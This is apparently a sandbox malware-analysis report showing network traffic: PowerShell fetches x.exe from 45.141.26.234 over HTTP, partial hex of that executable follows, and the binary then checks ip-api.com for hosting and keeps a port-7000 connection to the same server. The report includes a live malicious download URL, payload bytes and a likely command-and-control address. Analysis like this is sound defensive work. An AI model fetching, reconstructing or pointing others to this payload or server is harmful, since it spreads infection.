                                                                      Dec 13, 2024 17:45:59.711301088 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.711424112 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.711625099 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.715296030 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.766906023 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.845752001 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.845824003 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.845925093 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.850198030 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.850254059 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.850325108 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.858575106 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.858653069 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.858721972 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.970151901 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.970166922 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.970247030 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.978446960 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.978485107 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.978544950 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.089818001 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.089906931 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.089988947 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.098145008 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.098180056 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.098229885 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.209477901 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209557056 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209609032 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209623098 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.209642887 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209676981 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209697008 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.209711075 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209744930 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209758997 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.209779024 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209809065 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:46:00.209824085 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.256680012 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:00.393167973 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:46:03.961527109 CET4970580192.168.2.5208.95.112.1
                                                                      Dec 13, 2024 17:46:04.083303928 CET8049705208.95.112.1192.168.2.5
                                                                      Dec 13, 2024 17:46:04.083409071 CET4970580192.168.2.5208.95.112.1
                                                                      Dec 13, 2024 17:46:04.083916903 CET4970580192.168.2.5208.95.112.1
                                                                      Dec 13, 2024 17:46:04.203665018 CET8049705208.95.112.1192.168.2.5
                                                                      Dec 13, 2024 17:46:05.196789026 CET8049705208.95.112.1192.168.2.5
                                                                      Dec 13, 2024 17:46:05.251569986 CET4970580192.168.2.5208.95.112.1
                                                                      Dec 13, 2024 17:47:00.325020075 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:00.445321083 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:00.446820021 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:00.499252081 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:00.620357990 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.575964928 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.626610041 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:06.688498020 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:06.737879038 CET8049705208.95.112.1192.168.2.5
                                                                      Dec 13, 2024 17:47:06.738894939 CET4970580192.168.2.5208.95.112.1
                                                                      Dec 13, 2024 17:47:06.808811903 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.808871031 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.808933020 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.808960915 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.808996916 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.809042931 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:06.809062004 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.583699942 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.642215967 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:11.666522980 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:11.786662102 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.786695957 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.786768913 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.786798000 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.786825895 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.786854029 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.786905050 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:11.786932945 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:12.505172968 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:12.626357079 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:14.102804899 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:14.104784966 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:14.224539995 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:16.584005117 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:16.622123003 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:16.876648903 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:17.044756889 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.044775009 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.044787884 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.044800997 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.044812918 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.044819117 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.044830084 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.044842005 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:17.045428991 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.606827974 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.650671959 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:21.770663977 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.770705938 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.770785093 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.770795107 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.770920038 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.770931959 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.770972967 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:21.771039963 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:24.517841101 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:24.637840986 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:25.089353085 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:25.091536999 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:25.212384939 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.602719069 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.634111881 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:26.754209042 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.754221916 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.754230976 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.754235029 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.754271030 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.754287004 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.754296064 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:26.754303932 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:30.823369026 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:30.876724005 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:31.606398106 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.635322094 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:31.755388975 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.755409002 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.755501986 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.755610943 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.755791903 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.755877972 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.755943060 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:31.756082058 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.533500910 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:36.612035990 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.656281948 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:36.658245087 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.778026104 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.780767918 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.780778885 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.793195963 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.799036026 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.799096107 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.800497055 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:36.800509930 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:38.854074955 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:38.856369972 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:38.976177931 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.610018969 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.647942066 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:41.768064022 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.768086910 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.768136978 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.768188000 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.768234015 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.768287897 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.768409014 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:41.768425941 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:45.205431938 CET4970580192.168.2.5208.95.112.1
                                                                      Dec 13, 2024 17:47:45.325334072 CET8049705208.95.112.1192.168.2.5
                                                                      Dec 13, 2024 17:47:46.607021093 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.657887936 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:46.664561033 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:46.784704924 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.784846067 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.784874916 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.784909010 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.784961939 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.785012960 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.785120964 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:46.785171032 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:48.549102068 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:48.669519901 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:49.119921923 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:49.125353098 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:49.245129108 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.602592945 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.639978886 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:51.760081053 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.760124922 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.760232925 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.760301113 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.760363102 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.760443926 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.760653019 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:51.760693073 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.625318050 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.672624111 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:47:56.792777061 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.792797089 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.792826891 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.792857885 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.793030977 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.793045044 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.793133020 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:47:56.793158054 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:00.564759016 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:48:00.684561014 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:00.819355011 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:00.860992908 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:48:01.142564058 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:01.189117908 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:48:01.643347025 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:01.689155102 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:48:04.260859013 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:48:04.312338114 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:48:04.380743027 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433171034 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433219910 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433229923 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433239937 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433312893 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433322906 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433408976 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.433418989 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.885855913 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:04.886756897 CET497927000192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:48:05.006750107 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:06.660233021 CET70004979245.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:48:06.704782009 CET497927000192.168.2.545.141.26.234

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 13, 2024 17:46:03.816713095 CET6476953192.168.2.51.1.1.1
                                                                      Dec 13, 2024 17:46:03.955220938 CET53647691.1.1.1192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 13, 2024 17:46:03.816713095 CET192.168.2.51.1.1.10x435dStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 13, 2024 17:46:03.955220938 CET1.1.1.1192.168.2.50x435dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • 45.141.26.234
                                                                      • ip-api.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.54970445.141.26.234805908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 13, 2024 17:45:57.950910091 CET163OUTGET /x.exe HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: 45.141.26.234
                                                                      Connection: Keep-Alive
                                                                      Dec 13, 2024 17:45:59.590558052 CET1236INHTTP/1.1 200 OK
                                                                      Date: Fri, 13 Dec 2024 16:45:59 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                      Last-Modified: Wed, 30 Oct 2024 15:10:36 GMT
                                                                      ETag: "a200-625b31a9c95b5"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 41472
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-msdownload
                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6b 4c 22 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 98 00 00 00 08 00 00 00 00 00 00 be b7 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 b7 00 00 4b 00 00 00 00 c0 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELkL"g @ @pK H.text `.rsrc@@.reloc@BH|]Y(*(*ssss*0~o+*0~o+*0~o+*0~o+*0((+*0(+*0(+*0(+*0-(++++*
                                                                      Dec 13, 2024 17:45:59.590581894 CET1236INData Raw: 30 02 00 10 00 00 00 0a 00 00 11 03 12 00 fe 15 02 00 00 1b 06 81 02 00 00 1b 2a 1e 02 28 17 00 00 0a 2a 13 30 01 00 20 00 00 00 0b 00 00 11 7e 19 00 00 0a 8c 03 00 00 1b 2d 0a 28 02 00 00 2b 80 19 00 00 0a 7e 19 00 00 0a 0a 2b 00 06 2a 1e 02 28
                                                                      Data Ascii: 0*(*0 ~-(+~+*(*0zrpr3preprprprpr-pr_prprp(rp(*(*(*0
                                                                      Dec 13, 2024 17:45:59.590606928 CET1236INData Raw: 00 00 0a 6f 44 00 00 0a 06 72 19 03 00 70 7e 0f 00 00 04 28 49 00 00 0a 72 15 03 00 70 28 27 00 00 0a 6f 42 00 00 0a 06 28 43 00 00 0a 6f 44 00 00 0a de 0e 25 28 24 00 00 0a 0b 28 26 00 00 0a de 00 2a 01 10 00 00 00 00 0f 00 de ed 00 0e 28 00 00
                                                                      Data Ascii: oDrp~(Irp('oB(CoD%($(&*((-(,+(,+(,+(,(J*02sKrpoLrpoM($(&+* (03sNoOoPr
                                                                      Dec 13, 2024 17:45:59.590624094 CET1236INData Raw: 1c 00 00 00 00 5f 00 17 76 00 0c 28 00 00 01 00 00 00 00 9b 9b 00 0e 28 00 00 01 1b 30 07 00 30 01 00 00 14 00 00 11 18 17 1c 73 65 00 00 0a 80 13 00 00 04 15 6a 80 14 00 00 04 17 8d 4c 00 00 01 80 15 00 00 04 73 66 00 00 0a 80 16 00 00 04 7e 13
                                                                      Data Ascii: _v((00sejLsf~ og~ oh~~(iojs((%("(/~~~-skol&4sms[ '
                                                                      Dec 13, 2024 17:45:59.590639114 CET1236INData Raw: 86 00 00 0a 16 33 08 72 f9 05 00 70 0a de 41 08 6f 85 00 00 0a 16 08 6f 87 00 00 0a 17 da 6f 88 00 00 0a 0a de 2a de 0a 07 2c 06 07 6f 58 00 00 0a dc de 1c 25 28 24 00 00 0a 13 04 72 f9 05 00 70 0a 28 26 00 00 0a de 07 28 26 00 00 0a de 00 06 2a
                                                                      Data Ascii: 3rpAooo*,oX%($rp(&(&*(%Ej(0~rpssoo+0otYrKpo(rp(("o-,oX
                                                                      Dec 13, 2024 17:45:59.590661049 CET1236INData Raw: 00 00 00 1f 00 00 11 7e 19 00 00 04 13 04 11 04 28 9e 00 00 0a 16 13 05 11 04 12 05 28 9f 00 00 0a 7e 12 00 00 04 39 96 00 00 00 73 66 00 00 0a 0a 02 28 6d 00 00 06 28 75 00 00 06 0b 07 8e b7 28 a0 00 00 0a 72 d3 06 00 70 28 1e 00 00 0a 28 6d 00
                                                                      Data Ascii: ~((~9sf(m(u(rp((moo~o&~oo0sko&,oX%($(&,(*(*p$(
                                                                      Dec 13, 2024 17:45:59.590676069 CET1236INData Raw: 64 00 00 06 06 17 9a 28 1e 00 00 0a 28 b2 00 00 0a 0b 73 4b 00 00 0a 0c 08 06 18 9a 07 6f b3 00 00 0a 07 28 b4 00 00 0a 26 38 0c 06 00 00 11 13 72 35 07 00 70 16 28 55 00 00 0a 16 33 0e 06 17 9a 16 28 3e 00 00 06 38 ee 05 00 00 11 13 72 45 07 00
                                                                      Data Ascii: d((sKo(&8r5p(U3(>8rEp(U3(>8rUp(U3rkp(&8rp(U3rp(&8rp(U3rp(&8grp(U3(&8F
                                                                      Dec 13, 2024 17:45:59.590689898 CET1236INData Raw: 00 00 06 26 17 80 29 00 00 04 de 0c 28 24 00 00 0a 28 26 00 00 0a de 00 28 bf 00 00 0a 6f c0 00 00 0a 13 0c 28 bf 00 00 0a 6f c0 00 00 0a 13 17 12 17 28 c1 00 00 0a 12 0c 28 c2 00 00 0a 20 05 10 02 00 73 c3 00 00 0a 13 0e 11 0e 28 c4 00 00 0a 13
                                                                      Data Ascii: &)($(&(o(o(( s(oo( osf s( (oo(o(orp~((o
                                                                      Dec 13, 2024 17:45:59.590706110 CET332INData Raw: e3 09 00 70 18 8d 03 00 00 01 13 08 11 08 16 14 a2 11 08 17 18 8d 03 00 00 01 13 09 11 09 16 7e 1f 00 00 04 18 9a a2 11 09 17 7e 1f 00 00 04 19 9a 28 ad 00 00 0a 28 73 00 00 06 a2 11 09 a2 11 08 14 14 14 17 28 38 00 00 0a 26 dd 9c 02 00 00 38 50
                                                                      Data Ascii: p~~((s(8&8PrKp(5r?p(,Urp~(}(5("(;%8rKp(5rp(,fr
                                                                      Dec 13, 2024 17:45:59.591537952 CET1236INData Raw: 01 00 00 38 51 01 00 00 07 14 72 4b 06 00 70 16 8d 03 00 00 01 14 14 14 28 35 00 00 0a 72 5d 0a 00 70 16 28 d6 00 00 0a 39 a7 00 00 00 7e 1f 00 00 04 18 9a 28 d9 00 00 0a 39 91 00 00 00 7e 20 00 00 04 17 3b 81 00 00 00 17 80 20 00 00 04 07 14 72
                                                                      Data Ascii: 8QrKp(5r]p(9~(9~ ; rp(o~((s~~~(5("(: 8rKp(5rep(
                                                                      Dec 13, 2024 17:45:59.711301088 CET1236INData Raw: 00 00 0a 26 2a 00 00 01 1c 00 00 00 00 06 00 1c 22 00 0c 28 00 00 01 02 00 80 00 02 82 00 0a 00 00 00 00 1b 30 05 00 40 00 00 00 2a 00 00 11 16 0b 14 0c 07 b5 1f 64 28 ec 00 00 0a 13 04 12 04 1f 64 12 02 1f 64 28 40 00 00 06 2c 04 17 0a de 1c 07
                                                                      Data Ascii: &*"(0@*d(dd(@,1%($(&+*,,(0+((d((("(0 (!oPrpo,;rpsoArp(rp((


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.549705208.95.112.180616C:\Users\user\AppData\Local\Temp\x.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 13, 2024 17:46:04.083916903 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Dec 13, 2024 17:46:05.196789026 CET175INHTTP/1.1 200 OK
                                                                      Date: Fri, 13 Dec 2024 16:46:04 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 6
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                      Data Ascii: false


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:11:45:53
                                                                      Start date:13/12/2024
                                                                      Path:C:\Users\user\Desktop\da6ke5KbfB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\da6ke5KbfB.exe"
                                                                      Imagebase:0x400000
